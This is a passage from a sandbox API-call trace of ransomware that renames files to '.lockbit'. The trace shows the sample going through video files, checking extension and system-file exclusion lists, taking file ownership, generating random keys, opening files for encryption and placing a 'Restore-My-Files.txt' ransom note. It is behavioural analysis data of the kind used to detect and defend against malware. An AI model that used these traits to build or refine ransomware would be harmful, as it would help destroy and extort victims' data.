lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.869] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.869] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="flower_trans_MATTE_PAL.wmv") returned 1 [0079.869] lstrcmpiW (lpString1="ntldr", lpString2="flower_trans_MATTE_PAL.wmv") returned 1 [0079.869] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="flower_trans_MATTE_PAL.wmv") returned 1 [0079.869] lstrcmpiW (lpString1="bootsect.bak", lpString2="flower_trans_MATTE_PAL.wmv") returned -1 [0079.869] lstrcmpiW (lpString1="autorun.inf", lpString2="flower_trans_MATTE_PAL.wmv") returned -1 [0079.869] lstrcmpiW (lpString1="thumbs.db", lpString2="flower_trans_MATTE_PAL.wmv") returned 1 [0079.869] lstrcmpiW (lpString1="iconcache.db", lpString2="flower_trans_MATTE_PAL.wmv") returned 1 [0079.870] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.870] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv") returned=".wmv" [0079.870] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.870] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.870] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.871] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.871] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.871] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.871] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.871] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv.lockbit") returned 88 [0079.871] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.871] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.872] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.872] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.872] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.872] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.872] RtlFreeAnsiString (AnsiString="\\") [0079.872] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.872] malloc (_Size=0x200) returned 0x77d800 [0079.872] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.872] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.872] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.873] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.873] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.873] CloseHandle (hObject=0x3c4) returned 1 [0079.873] free (_Block=0x77d800) [0079.873] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.873] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.874] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.874] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=165208) returned 1 [0079.874] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.874] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.874] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.875] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.875] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.889] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.889] malloc (_Size=0xc6) returned 0x1ff1e60 [0079.889] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc6, FileInformationClass=0xa) returned 0xc0000008 [0079.889] free (_Block=0x1ff1e60) [0079.889] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.889] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.889] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.889] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b0649f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b0649f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b44779d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2e31e, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_trans_rgb.wmv", cAlternateFileName="")) returned 1 [0079.889] lstrcmpiW (lpString1=".", lpString2="flower_trans_rgb.wmv") returned -1 [0079.889] lstrcmpiW (lpString1="..", lpString2="flower_trans_rgb.wmv") returned -1 [0079.889] PathFindExtensionW (pszPath="flower_trans_rgb.wmv") returned=".wmv" [0079.889] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.889] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.889] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.889] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.890] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.891] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.891] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.892] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="flower_trans_rgb.wmv") returned 1 [0079.892] lstrcmpiW (lpString1="ntldr", lpString2="flower_trans_rgb.wmv") returned 1 [0079.892] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="flower_trans_rgb.wmv") returned 1 [0079.892] lstrcmpiW (lpString1="bootsect.bak", lpString2="flower_trans_rgb.wmv") returned -1 [0079.892] lstrcmpiW (lpString1="autorun.inf", lpString2="flower_trans_rgb.wmv") returned -1 [0079.892] lstrcmpiW (lpString1="thumbs.db", lpString2="flower_trans_rgb.wmv") returned 1 [0079.892] lstrcmpiW (lpString1="iconcache.db", lpString2="flower_trans_rgb.wmv") returned 1 [0079.892] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.892] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv") returned=".wmv" [0079.892] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.892] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.892] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.893] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.893] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv.lockbit") returned 82 [0079.893] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.895] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.895] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.895] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.896] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.896] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.896] RtlFreeAnsiString (AnsiString="\\") [0079.896] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.896] malloc (_Size=0x200) returned 0x77d800 [0079.896] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.896] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.896] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.896] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.897] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.897] CloseHandle (hObject=0x3c4) returned 1 [0079.897] free (_Block=0x77d800) [0079.897] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.897] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.897] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.897] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=189214) returned 1 [0079.897] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.898] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.898] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.899] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.899] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.913] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.913] malloc (_Size=0xba) returned 0x1ff1e60 [0079.913] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xba, FileInformationClass=0xa) returned 0xc0000008 [0079.913] free (_Block=0x1ff1e60) [0079.913] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.913] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.913] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.913] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b2c5fc, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b2c5fc, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5c4549, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x39e98, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_trans_RGB_PAL.wmv", cAlternateFileName="")) returned 1 [0079.913] lstrcmpiW (lpString1=".", lpString2="flower_trans_RGB_PAL.wmv") returned -1 [0079.913] lstrcmpiW (lpString1="..", lpString2="flower_trans_RGB_PAL.wmv") returned -1 [0079.913] PathFindExtensionW (pszPath="flower_trans_RGB_PAL.wmv") returned=".wmv" [0079.913] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.913] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.913] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.913] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.913] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.914] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.914] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.915] lstrcmpiW (lpString1=".dll", 